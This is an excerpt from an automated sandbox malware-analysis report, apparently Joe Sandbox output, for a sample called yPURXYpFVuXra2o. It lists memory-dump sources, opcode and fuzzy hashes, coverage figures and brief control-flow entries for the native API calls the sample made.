                                                                                                                                                                                                        • Opcode Fuzzy Hash: 97bd750c25c31143d5badd86df23b63042e9ca259920186b0e46edb3c6381daf
                                                                                                                                                                                                        • Instruction Fuzzy Hash: D7110A71509605DFC7909FA4F4882347BF4FB49314B5148DAD48A8E349E6738AA6DB41
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 29ffa7632b69a83d4a6dc532820d31bb8ccaeee5ee0bc5e24de2eab42b1b5d27
                                                                                                                                                                                                        • Instruction ID: 2d5964208e06c97b7f77149f82f64ea4665cd8595ddd4f5652c7c82513daaf6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 29ffa7632b69a83d4a6dc532820d31bb8ccaeee5ee0bc5e24de2eab42b1b5d27
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0C012974A09208DFD704DFA8C554AADBBF6FF49204F15849AD9099B366D7309E01DB41
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 899aa45a3d46ec9523fa3423023cde9ad1c6d21325ac81d6e1fb435f37b0d7f4
                                                                                                                                                                                                        • Instruction ID: 93147828d72fe47ea0e0ef509ca05d2e05c58500d581578cd718d78b709738f0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 899aa45a3d46ec9523fa3423023cde9ad1c6d21325ac81d6e1fb435f37b0d7f4
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1A011B71508605DFC790DF94F4882307BE5F748714BA048DAD49A8E349EA73CAB29B81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 3382463a23f0362a1b0beac3c1dbd2bf2099258d3f38e74e206769129fd5088d
                                                                                                                                                                                                        • Instruction ID: d74cae07e1e5d7461046a394ea0724a64a1162ed202bface9af2e75be35a6796
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 3382463a23f0362a1b0beac3c1dbd2bf2099258d3f38e74e206769129fd5088d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 52017CB090D248DFDB05CFA9C910AADBBF6AB4A604B0495AAD4059F216D7304E01CB90
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4ece2ddcbf209f990354c461bc26a388d8fe2e6c3c79f382e4a2b538486e3ff8
                                                                                                                                                                                                        • Instruction ID: 7cb7f8977d7482497b5ad68bc08761476e8ee662da9dc336d5547ad3b8394be0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4ece2ddcbf209f990354c461bc26a388d8fe2e6c3c79f382e4a2b538486e3ff8
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9B016734E00308AFDB94AFF5E8486AE77F6FF48750F11C469D90ADB344EA3089509B91
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e416bcb362dcdb3d7d07233a81ad73b88457c66bff54e3d8e6189cf3be7d82a7
                                                                                                                                                                                                        • Instruction ID: 7ef32d5de084a32c4623bab04ce7e0086be60fbd2845f5d52b2b8a77ac853bf4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e416bcb362dcdb3d7d07233a81ad73b88457c66bff54e3d8e6189cf3be7d82a7
                                                                                                                                                                                                        • Instruction Fuzzy Hash: F9014C34D0020DAFDB44EFE4D5506AEBBF1FB48200F2089A6D056A7394EB745A00CF81
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 47fe0832cb6b57ca5fb55dbb3c01994f22732af92ed9645cf35e534fa529ca41
                                                                                                                                                                                                        • Instruction ID: 55059cb7be88417178ccacaa86b5c423db95bfcb6b9b29afba7a17556e3d2ce0
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 47fe0832cb6b57ca5fb55dbb3c01994f22732af92ed9645cf35e534fa529ca41
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 4601B071500F14CFC334DF1AF588912BBF4FB88710781899AD4CA87A68EBB2A464CB44
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: d96425e547c0a5fc7121a12e6dcca8c9728d40fcafe049143f9865761a759714
                                                                                                                                                                                                        • Instruction ID: e8de62cf62b1bb4ff5666cfe0dbc5b3ae5936593de425b5a2f722ea1ce9c3b55
                                                                                                                                                                                                        • Opcode Fuzzy Hash: d96425e547c0a5fc7121a12e6dcca8c9728d40fcafe049143f9865761a759714
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 83F037B0A08208DFCB08CF9AD550AADFBFABB89704F1095AA94095F216D7709E40DF80
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: a4f10e9a33a02e60ad099879c4caec16f4f4cbcc0acc854f91f1409d85dd139d
                                                                                                                                                                                                        • Instruction ID: 0ed49d21b008b96438e33e57d2b92459be65c8dbe11ce9d7cc2d53c0e349ecdd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: a4f10e9a33a02e60ad099879c4caec16f4f4cbcc0acc854f91f1409d85dd139d
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9801E435508255CFCB14CF94C5959ACBBBAFF4EA11F50549AD40AAB216C730EE41CF20
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 4a112a4e3220af482532980de8fe328de766b7ba7bb2296ccdeb66d7822b46a2
                                                                                                                                                                                                        • Instruction ID: 32bf488b048f9d524de5adbd97bcd10360cfb24a4acc9342d294fdf84d3cf58e
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 4a112a4e3220af482532980de8fe328de766b7ba7bb2296ccdeb66d7822b46a2
                                                                                                                                                                                                        • Instruction Fuzzy Hash: B701F278904129CFDB20CFA8D985BACBBB5FB49700F11959AD809BB206D734A980CF20
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7509ccb0c94b76727c9da649c6080616e87d90c7f5b1ffbaa7b9985d1589b0a5
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9CC012113505351B898A72BD641257F715ACAC18903904469F90A5B6C1CD19EA0202EA
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 342c3417070555da21c863c350c57f2042e401090b4a376265ceaace533dd872
                                                                                                                                                                                                        • Instruction ID: f18299c43c897066c2bdbd5c80748bf2c4dddc80c36237d36dcf7d82d018f123
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 342c3417070555da21c863c350c57f2042e401090b4a376265ceaace533dd872
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 8AD05BA616DB8BDFD7131EE4C8181513F60FA5261074540DBC4D0DF473F5289845C763
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: df19f19a2ec13519c7ea1c2151d526d004621ab461933b63d9afe04c5a186d49
                                                                                                                                                                                                        • Instruction ID: 5214977b703d829e712f8fafe88314fcb41e64ac9611067d53111eae451b97a6
                                                                                                                                                                                                        • Opcode Fuzzy Hash: df19f19a2ec13519c7ea1c2151d526d004621ab461933b63d9afe04c5a186d49
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 58D05EB9908149CFCB01CF51C8146ADBB7BBB9A380F008596C40A66215D7700A95CF90
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 430e4fb2c2a2f7ec8f1d61d40dab30ff1ef64b24f18cdf02ce9a7bd0dca58feb
                                                                                                                                                                                                        • Instruction ID: f24b1e65dfd44e6b6117cc2dbb07b53f972d72cfecb9a1e87151a311ab8c702c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 430e4fb2c2a2f7ec8f1d61d40dab30ff1ef64b24f18cdf02ce9a7bd0dca58feb
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 23C08C70000304CBE2002BDDF60C328766AB709A22F4000229709431268A780240CF92
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 18a5d2c74c6a2ec12bffc3cb22009c3911ebf159ba77dade3156141f134088c1
                                                                                                                                                                                                        • Instruction ID: 5e7768673b4652a9a042dba92f0e781759b159f8b65dd9a453ef0cd9095bde93
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 18a5d2c74c6a2ec12bffc3cb22009c3911ebf159ba77dade3156141f134088c1
                                                                                                                                                                                                        • Instruction Fuzzy Hash: E0C012318083849FCB114F50A4951D43B365A16310F154093DC458B173D2214925C752
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 8253c05fc789faa679886ac8822b9dd2059a9a43c07992725863394157347355
                                                                                                                                                                                                        • Instruction ID: fa046e0773df6f91ff21722e7a1ea6e7ed30c63375ce5bc1b704d6e1c3ba2a52
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 8253c05fc789faa679886ac8822b9dd2059a9a43c07992725863394157347355
                                                                                                                                                                                                        • Instruction Fuzzy Hash: EB90023144470C8F57502B95744D965B75DA548515B840051A50E415055A65E41046A5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: e4e2cea3ea610820636511123fdd8923b32765c06dab3ff1362427bb9c745c3b
                                                                                                                                                                                                        • Instruction ID: cd4a73a884f2f2c337dc08895daa82c4676b6ef351e3472ac671e4df04a9a0e4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: e4e2cea3ea610820636511123fdd8923b32765c06dab3ff1362427bb9c745c3b
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 27A001B4889106DED7109E969408368BAA1A708619F10C45A9A12566818AB953449F01
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 77162ba4c756270dd016f53c430a4ee0d0dae62be2130751a43b399647fd6c9e
                                                                                                                                                                                                        • Instruction ID: ce96809e2c0666ead2e26f538e102d121a3be27f889cfa072c123259815794f4
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 77162ba4c756270dd016f53c430a4ee0d0dae62be2130751a43b399647fd6c9e
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9EE12874E002198FDB58DFA9C691AAEBBF2FF89304F24C169D415AB359D730A941CF60
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0b78addc56d0a4a2689f5bef9d1c5cfbb89ac6d54dca2b27a267d1b3627fc7db
                                                                                                                                                                                                        • Instruction ID: 529b3361a903dfd637141013ff0ef4fd5d1956941bcf9ef1975279df5b2f3525
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0b78addc56d0a4a2689f5bef9d1c5cfbb89ac6d54dca2b27a267d1b3627fc7db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1FE12774E002598FDB54DFA9C690AAEBBF2FF89300F24C169D415AB359D730A941CFA1
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID:
                                                                                                                                                                                                        • Opcode ID: 0833c135d66877ccbc647d333278a751736f34d97c66ba1d4ffd62358e91f352
                                                                                                                                                                                                        • Instruction ID: 12660742c36fc86f46b4d4ef99022edd93da0a5686e2825b31c08c672aa49424
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 0833c135d66877ccbc647d333278a751736f34d97c66ba1d4ffd62358e91f352
• Instruction Fuzzy Hash: F1E14C74E002198FDB54DFA9C690AAEFBF2FF88341F248169D415AB356D730A941CFA0
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 977e59192b2e4a72890ced6185351c82196bad71adae78319b75639ee3540cf5
• Instruction ID: 2054c10f472d1ef6c5076b1dcaee17c5d70674564e13097e4bba5a57b64982b3
• Opcode Fuzzy Hash: 977e59192b2e4a72890ced6185351c82196bad71adae78319b75639ee3540cf5
• Instruction Fuzzy Hash: FBE14C74E002198FDB54DFA9C690AAEFBF2FF88341F248169E415AB355D730A941CFA0
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: 8039fcfa62fe7eb36c418e6063ad983b0c6bcecf032fbb6d6756e87df965371c
• Instruction ID: 1c6f9464c0c0cc4d446213f5d04c8658deffbc8941c882903e44898ec16663b8
• Opcode Fuzzy Hash: 8039fcfa62fe7eb36c418e6063ad983b0c6bcecf032fbb6d6756e87df965371c
• Instruction Fuzzy Hash: 3FE15D74E002598FDB54DFA9C591AAEFBF2FF88300F248169D419AB356D7309941CFA0
Memory Dump Source
• Source File: 00000003.00000002.32570669533.0000000006C60000.00000040.00000800.00020000.00000000.sdmp, Offset: 06C60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_6c60000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID:
• API String ID:
• Opcode ID: d8e7c5e929df88693c78b95271cd1e107382accce0b564ccb33112586eef3307
• Instruction ID: 33b73f2eb9665f83135c9f38403721e3923235ad3de2f6ce705c0dc93fbf0d33
• Opcode Fuzzy Hash: d8e7c5e929df88693c78b95271cd1e107382accce0b564ccb33112586eef3307
• Instruction Fuzzy Hash: A2513974E042598FDB18CFAAC5915AEFBF2EF89300F24C16AD419AB355D7309A41CFA1
Strings
Memory Dump Source
• Source File: 00000003.00000002.32565998583.00000000015C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 015C0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_15c0000_yPURXYpFVuXra2o.jbxd
Similarity
• API ID:
• String ID: 4qXq$4qXq$4qXq$4qXq
• API String ID: 0-3781232218
• Opcode ID: 5a81bdec4183f14798828835b33059430a87697eeaf066f0bd13cda11583205f
• Instruction ID: ed4e7d64a22ad2257cadd1d60d74f46a3a0e90c49bfa4ed0367bd2f8f04ac227
• Opcode Fuzzy Hash: 5a81bdec4183f14798828835b33059430a87697eeaf066f0bd13cda11583205f
• Instruction Fuzzy Hash: 0F218430B002069FD7549EAD8850ABE72E6FBC5B54F2048AED546EF394EF718D018796

Execution Graph

Execution Coverage: 1.7%
Dynamic/Decrypted Code Coverage: 2.7%
Signature Coverage: 5.7%
Total number of Nodes: 557
Total number of Limit Nodes: 66

                                                                                                                                                                                                        Control-flow Graph

                                                                                                                                                                                                        • Executed
                                                                                                                                                                                                        • Not Executed
control_flow_graph 0 41a410-41a459 call 41af60 NtReadFile
APIs
• NtReadFile.NTDLL(rMA,5EB65239,FFFFFFFF,?,?,?,rMA,?,1JA,FFFFFFFF,5EB65239,00414D72,?,00000000), ref: 0041A455
Strings
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: FileRead
• String ID: 1JA$rMA$rMA
• API String ID: 2738559852-782607585
• Opcode ID: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction ID: c6e97d42c3e85b78cd3a41c20c82dd28da71633a8e67c8174f08c115ef6e08ba
• Opcode Fuzzy Hash: d4a5a74702051ab3f1355cb9c04464ae45872bc81882c1ce62b08827cfd1deed
• Instruction Fuzzy Hash: 87F0B7B2200208AFCB14DF89DC81EEB77ADEF8C754F158249BE1D97241D630E851CBA4

Control-flow Graph

control_flow_graph 238 40acf0-40ad0c 239 40ad14-40ad19 238->239 240 40ad0f call 41cc50 238->240 242 40ad1b-40ad1e 239->242 243 40ad1f-40ad2d call 41d070 239->243 240->239 246 40ad3d-40ad4e call 41b4a0 243->246 247 40ad2f-40ad3a call 41d2f0 243->247 252 40ad50-40ad64 LdrLoadDll 246->252 253 40ad67-40ad6a 246->253 247->246 252->253
APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 0040AD62
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
• Opcode ID: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction ID: bd03027937dafe21d6f438616a486266aae6a772261e1344982784e00def1180
• Opcode Fuzzy Hash: dc2098e385e942efcd48a296202403441f5905bb34daa24398974f8d6af8945c
• Instruction Fuzzy Hash: 80015EB5E0020DBBDF10DBA1DC42FDEB3789F54308F0045AAA908A7281F634EB548B95

Control-flow Graph

control_flow_graph 254 41a360-41a3b1 call 41af60 NtCreateFile
APIs
• NtCreateFile.NTDLL(00000060,00409CF3,?,00414BB7,00409CF3,FFFFFFFF,?,?,FFFFFFFF,00409CF3,00414BB7,?,00409CF3,00000060,00000000,00000000), ref: 0041A3AD
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: CreateFile
• String ID:
• API String ID: 823142352-0
• Opcode ID: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction ID: 1571a74e51eef41835f20cf1113afde9e84efeac6e640e2865a3d9423fa4fe5b
• Opcode Fuzzy Hash: 255eac8f353b7b8934ff6a71ff904c2473dc3201d920852afcf054611f931be4
• Instruction Fuzzy Hash: FEF0BDB2201208ABCB08CF89DC85EEB77ADAF8C754F158248BA0D97241C630E8518BA4

Control-flow Graph

control_flow_graph 264 41a540-41a57d call 41af60 NtAllocateVirtualMemory
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction ID: 60dc777ab2a5703fe93ec60752bbea5a413bae98553eb5929f98badcd8fbe991
• Opcode Fuzzy Hash: b2c7a9f16f7248b886659db27fd6bc2ac43cd74a54ece53f3674161978f52f4b
• Instruction Fuzzy Hash: B2F015B2200208ABCB14DF89CC81EEB77ADEF8C754F158149BE0897241C630F811CBA4

Control-flow Graph

control_flow_graph 261 41a53a-41a556 262 41a55c-41a57d NtAllocateVirtualMemory 261->262 263 41a557 call 41af60 261->263 263->262
APIs
• NtAllocateVirtualMemory.NTDLL(00003000,?,00000000,?,0041B134,?,00000000,?,00003000,00000040,00000000,00000000,00409CF3), ref: 0041A579
Memory Dump Source
• Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
Yara matches
Similarity
• API ID: AllocateMemoryVirtual
• String ID:
• API String ID: 2167126740-0
• Opcode ID: d91486fe2ffad1751c79064d739bca1f1420cf6ca2fe6429d7d2e47adf0f17de
• Instruction ID: 06b5fa4f77337b1b55011d1b34a447182765772a9380862f9c985b0d80157d3f
• Opcode Fuzzy Hash: d91486fe2ffad1751c79064d739bca1f1420cf6ca2fe6429d7d2e47adf0f17de
• Instruction Fuzzy Hash: 8FF08CB1100149ABCB04DF98D884CE777A9FF88224B15868EF94897203C234D811CBA1

Control-flow Graph

                                                                                                                                                                                                        control_flow_graph 267 41a48a-41a4b9 call 41af60 NtClose
                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • NtClose.NTDLL(00414D50,?,?,00414D50,00409CF3,FFFFFFFF), ref: 0041A4B5
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000005.00000002.30406041062.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_5_2_400000_yPURXYpFVuXra2o.jbxd
                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Close
                                                                                                                                                                                                        • String ID:
                                                                                                                                                                                                        • API String ID: 3535843008-0
